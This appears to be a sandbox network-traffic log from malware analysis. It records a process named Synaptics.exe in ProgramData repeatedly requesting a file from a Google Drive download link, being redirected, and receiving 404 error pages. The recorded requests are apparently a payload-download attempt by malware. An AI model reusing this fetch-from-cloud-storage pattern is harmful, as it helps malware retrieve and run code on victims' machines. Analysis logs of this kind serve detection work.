                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-eQwh1PLgP2Ilyl2E_kjJ8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49760 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:17 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:17 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-6NBVQ4Uka2-bzHrMeDFqeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49765 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ot5Mdhs9dtJ7MGuhflsy5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49768 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:19 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:20:20 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6YFaTmHlRFjtggrHut14_9Y0AkMcZggaCBllvmvL7PGvq9RVDODe4akCbXd9ZN0IQu
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-nIZcPLttQK9a5q7RAYtLNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
2024-12-24 17:20:20 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-24 17:20:20 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="l9Q3hhjk1jSPgFjvqw39OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-24 17:20:20 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49766 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zXPjIT4VAsMqAZ6EYYyf9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49767 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:19 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:20:20 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4ROYDkho0iyFpPn2cOiAKc0jcqdaptPyWMDJGbcxxqFhxuZO7U3gR6Ox-2lrICTUYuBXobt_s
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:20 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CI8PN4ccnRGAJ33L_3PUwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
2024-12-24 17:20:20 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 17:20:20 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="nEKiPLz6bUV0ARsU9L_96g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-24 17:20:20 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                12 | 192.168.2.4 | 49781 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:24 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LuhGcBBTCTONA-YVUmjmuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                13 | 192.168.2.4 | 49780 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:24 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-GYvC9lMF11fPwhvZCVNTTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                14 | 192.168.2.4 | 49784 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gjTKdkUf5-G0oE47DXqKRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                15 | 192.168.2.4 | 49786 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:26 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:27 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7stqITSD3PgerT1bX0gZJXMPNKWyLTsQK0sgeDHedi5BeByHb7tSPiT1qpG-bZGi4m
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:26 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-j1k3x-rTkNYqY5G-xCTHiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:27 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:20:27 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ZblIG_8bWAcTorKmOC5aQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:20:27 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                16 | 192.168.2.4 | 49787 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:26 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:27 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4y0zf8AKmqhh7DNdWzjCeVamfZYOSWlMMEzuTCOlfuXMtK2sDOjMr1Jo2nZ4YDAt1bhPwVGpw
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:27 GMT
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ZZMk8UVLiGh4VY-Pe_yDRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
